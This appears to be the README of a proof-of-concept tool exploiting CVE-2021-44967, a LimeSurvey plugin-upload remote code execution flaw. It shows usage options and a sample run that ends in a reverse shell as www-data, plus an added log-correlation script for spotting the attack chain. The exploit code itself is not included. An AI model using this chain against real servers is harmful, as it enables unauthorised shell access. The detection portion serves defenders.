# POC for CVE-2021-44967: LimeSurvey RCE
## Description
This Proof-of-Concept (POC) can be used to exploit CVE-2021-44967 to upload and execute a malicious LimeSurvey PHP plugin as administrator to obtain a reverse shell.
A Remote Code Execution (RCE) vulnerability exists in LimeSurvey 5.2.4 via the plugin upload and install function, which could let a remote malicious user upload an arbitrary PHP code file.
- Severity: 8.3 HIGH
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
## Usage
```text
usage: limesurvey_rce.py [-h] -t URL -u USERNAME -p PASSWORD [-f FILE] [--listen-ip LISTEN_IP] [--listen-port LISTEN_PORT] [--threads THREADS] [--sleep-time SLEEP_TIME] [--row ROW]
[--length LENGTH] [-a USERAGENT] [-x PROXY] [-v]
POC for CVE-2021-44967 (LimeSurvey RCE)
options:
-h, --help show this help message and exit
-t, --url URL LimeSurvey Target URL
-u, --username USERNAME
LimeSurvey username
-p, --password PASSWORD
LimeSurvey password
-f, --file FILE Custom PHP payload file
--listen-ip LISTEN_IP
Listening IP / Interface
--listen-port LISTEN_PORT
Listening Port
-a, --useragent USERAGENT
User agent to use when sending requests
-x, --proxy PROXY HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
-v, --verbose Verbosity enabled - additional output flag
```
## Example
```sh
python3 limesurvey_rce.py -t https://TARGET/ -u 'USERNAME' -p 'PASSWORD'
[*] Authenticating ...
[+] Login successful!
[*] Uploading plugin ...
[*] Activating plugin ...
[*] Starting listener and sending reverse shelll ...
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from X.X.X.X:51004.
www-data@target:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Tested on LimeSurvey Community Edition Version 6.6.4.
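The description and the session above show the chain this POC follows: an authenticated login, a plugin upload, then a plugin activation. As an added defender-side example (not part of this POC or of LimeSurvey), the Python routine below correlates that sequence in web-server access logs. It assumes Apache combined log format, and the LimeSurvey admin path fragments (`/authentication/sa/login`, `/pluginmanager/sa/upload`, `/pluginmanager/sa/activate`) are an assumption about its routing to verify against your own deployment; the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines (Apache combined log format) mirroring the POC's
# login -> plugin upload -> plugin activation sequence. The admin paths are an
# assumption about LimeSurvey's routing; verify them against your deployment.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "POST /index.php/admin/authentication/sa/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:10:00:03 +0000] "POST /index.php/admin/pluginmanager/sa/upload HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:10:00:05 +0000] "POST /index.php/admin/pluginmanager/sa/activate HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2024:10:30:00 +0000] "GET /index.php/admin/pluginmanager/sa/index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2024:12:00:00 +0000] "POST /index.php/admin/pluginmanager/sa/upload HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Stages of the chain, as (label, path fragment to match).
STAGES = [("login", "/authentication/sa/login"),
          ("plugin_upload", "/pluginmanager/sa/upload"),
          ("plugin_activate", "/pluginmanager/sa/activate")]

def parse_line(line):
    """Parse one access-log line into (ip, timestamp, method, path) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path")

def find_plugin_chains(log_text, window=timedelta(minutes=10)):
    """Return {ip: [stage labels]} for sources whose POSTs hit every stage
    within `window`; a lone upload outside that span is not reported."""
    events = defaultdict(list)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec[2] != "POST":
            continue
        ip, ts, _, path = rec
        for label, fragment in STAGES:
            if fragment in path:
                events[ip].append((label, ts))
    hits = {}
    for ip, evs in events.items():
        labels = [lbl for lbl, _ in evs]
        if all(lbl in labels for lbl, _ in STAGES) and evs[-1][1] - evs[0][1] <= window:
            hits[ip] = labels
    return hits
```

A legitimate administrator installing a plugin produces the same sequence, so treat a hit as a review trigger against the change record rather than as proof of compromise.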
## References
- [CVE-2021-44967](https://nvd.nist.gov/vuln/detail/CVE-2021-44967)
- [Original POC](https://github.com/Y1LD1R1M-1337/Limesurvey-RCE)